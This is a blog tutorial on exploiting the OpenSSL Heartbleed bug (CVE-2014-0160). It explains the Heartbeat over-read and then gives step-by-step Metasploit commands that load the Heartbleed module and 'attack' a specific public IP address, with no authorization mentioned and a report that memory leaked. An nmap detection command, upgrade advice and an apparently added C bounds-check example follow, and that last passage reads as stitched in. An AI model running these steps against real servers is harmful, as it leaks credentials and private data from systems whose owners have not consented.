How to Exploit Heartbleed using Metasploit in Kali Linux

The Heartbleed vulnerability (registered as CVE-2014-0160) is a security bug present in older versions of the OpenSSL cryptographic library. OpenSSL is a cryptographic toolkit used to implement the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols. The Heartbleed bug in OpenSSL was discovered in 2012, while in 2014 it was publicly disclosed. This article discusses the steps to exploit the Heartbleed vulnerability.

Around half a million web servers that claimed to be secure and were trusted by a certificate authority were believed to be compromised because of this vulnerability. The bug allowed attackers to access sensitive information present on web servers even though the servers were using a TLS-secured communication link, because the vulnerability was not in TLS itself but in its OpenSSL implementation.

How does it work?

To understand how the Heartbleed vulnerability works, we first need to understand how SSL/TLS works. The SSL/TLS protocol has an extension called 'Heartbeat': a request message consists of a payload along with the length of that payload, a 16-bit integer. Heartbeat request messages let the two communicating computers know that they are still connected, even if the user is not uploading or downloading anything at that time.

Now let's say a client sends a Heartbeat request to the server saying: send me the four-letter word 'bird'. The server receives this message in encrypted form and acknowledges the request by sending back the exact same piece of data, i.e. 'bird'. The Heartbeat request includes information about its own length. In the malicious scenario, the client sends the request saying: send me the word 'bird', which is 500 letters long. The server then copies from its memory buffer based on the reported length of the request, rather than the four bytes actually sent, and sends back that much data, which includes whatever else happened to be in the web server's memory. The attacker can repeat this many times to extract useful information, including login credentials.

Heartbleed Exploit Demo

In this demo I will show a simple exploit of how an attacker can compromise the server using Kali Linux.

Step01: Install Metasploit to use the latest auxiliary module for Heartbleed

#apt install metasploit-framework

Be patient, as it will take some time. I have already installed the framework here; after the installation is complete you will be back at the Kali prompt.

Step02: Start the Metasploit console

#msfconsole


Step03: Search for the Heartbleed module using the built-in search feature of the Metasploit framework, and select the first auxiliary module, which I have highlighted

#search heartbleed


Step04: Load the Heartbleed module with the command

#use auxiliary/scanner/ssl/openssl_heartbleed


Step05: After loading the auxiliary module, display the info page to reveal the options needed to set the target

#info


Step06: Set the RHOSTS parameter to the target website that is to be attacked

#set RHOSTS 86.104.176.22


Step07: To get verbose output and see what happens when I attack the target, enable verbose

#set VERBOSE true


Step08: Finally, attack the target by typing the command:

#exploit


The target system has leaked some random information. An attacker can perform this procedure again and again to extract useful information, because he has no control over which memory location is leaked and cannot choose the desired content; every time the process is repeated, different data may be extracted.

There are many tools that will show whether a website is still vulnerable to the Heartbleed attack. In our case we checked for the vulnerability using the Nmap tool.

Simply type: #nmap -p 443 --script ssl-heartbleed [Target's IP]

It shows that the target system is using an old version of OpenSSL and has the vulnerability that can be exploited.

Heartbleed is still present on many web servers that have not been upgraded to a patched version of OpenSSL. The way to fix this vulnerability is to upgrade to the latest version of OpenSSL. The affected versions of OpenSSL are 1.0.1 through 1.0.1f. Avoid using these versions.
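To make the 'bird' explanation and the fix concrete, here is an added example (hypothetical helper code, not OpenSSL's source) that parses an RFC 6520 Heartbeat message and applies the bounds check that the patched versions added: a request whose claimed payload length does not fit inside the bytes actually received is discarded instead of answered. The message layout and the 16-byte minimum padding come from RFC 6520; the sample requests at the bottom are constructed.

```c
#include <stdint.h>
#include <string.h>

/* Hypothetical helper, not OpenSSL's code: the RFC 6520 Heartbeat bounds check
 * that the patched OpenSSL added. Message layout: type (1 byte), payload_length
 * (2 bytes, big-endian), payload, then at least 16 bytes of padding. */
#define HB_REQUEST  1
#define HB_RESPONSE 2
#define HB_MIN_PAD  16
enum hb_verdict { HB_OK = 0, HB_TOO_SHORT = -1, HB_LENGTH_MISMATCH = -2, HB_BAD_TYPE = -3 };

/* HB_OK only when every claimed payload byte lies inside the msg_len bytes
 * actually received; any other verdict means discard without answering. */
int hb_check(const uint8_t *msg, size_t msg_len,
             const uint8_t **payload, uint16_t *payload_len)
{
    if (msg_len < 3 + HB_MIN_PAD) return HB_TOO_SHORT;
    if (msg[0] != HB_REQUEST && msg[0] != HB_RESPONSE) return HB_BAD_TYPE;
    uint16_t claimed = (uint16_t)((msg[1] << 8) | msg[2]);
    /* The check the affected versions lacked: they trusted the claimed length,
     * so a request announcing 500 bytes but carrying 4 got 500 bytes of heap back. */
    if ((size_t)3 + claimed + HB_MIN_PAD > msg_len)
        return HB_LENGTH_MISMATCH;
    *payload = msg + 3;
    *payload_len = claimed;
    return HB_OK;
}

/* Builds the response for a valid request; returns bytes written or -1.
 * It echoes exactly the payload bytes that exist, never more. */
int hb_respond(const uint8_t *req, size_t req_len, uint8_t *out, size_t out_cap)
{
    const uint8_t *payload; uint16_t plen;
    if (hb_check(req, req_len, &payload, &plen) != HB_OK || req[0] != HB_REQUEST)
        return -1;
    size_t need = 3 + (size_t)plen + HB_MIN_PAD;
    if (need > out_cap) return -1;
    out[0] = HB_RESPONSE; out[1] = (uint8_t)(plen >> 8); out[2] = (uint8_t)plen;
    memcpy(out + 3, payload, plen);          /* copies only the validated length */
    memset(out + 3 + plen, 0, HB_MIN_PAD);   /* real TLS uses random padding */
    return (int)need;
}

/* Stand-alone run: exit status 0 means a constructed request that claims
 * 0x01F4 = 500 bytes while carrying only 'bird' was refused. */
int main(void) {
    uint8_t bad[23] = {HB_REQUEST, 0x01, 0xF4, 'b', 'i', 'r', 'd'};
    const uint8_t *p; uint16_t n;
    return hb_check(bad, sizeof bad, &p, &n) == HB_LENGTH_MISMATCH ? 0 : 1;
}
```

The same length comparison, applied to captured heartbeat records, is what a scanner or IDS uses to flag a malformed request, which is why the Nmap script above can test a server without reading any of its memory.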

Ehacking Staff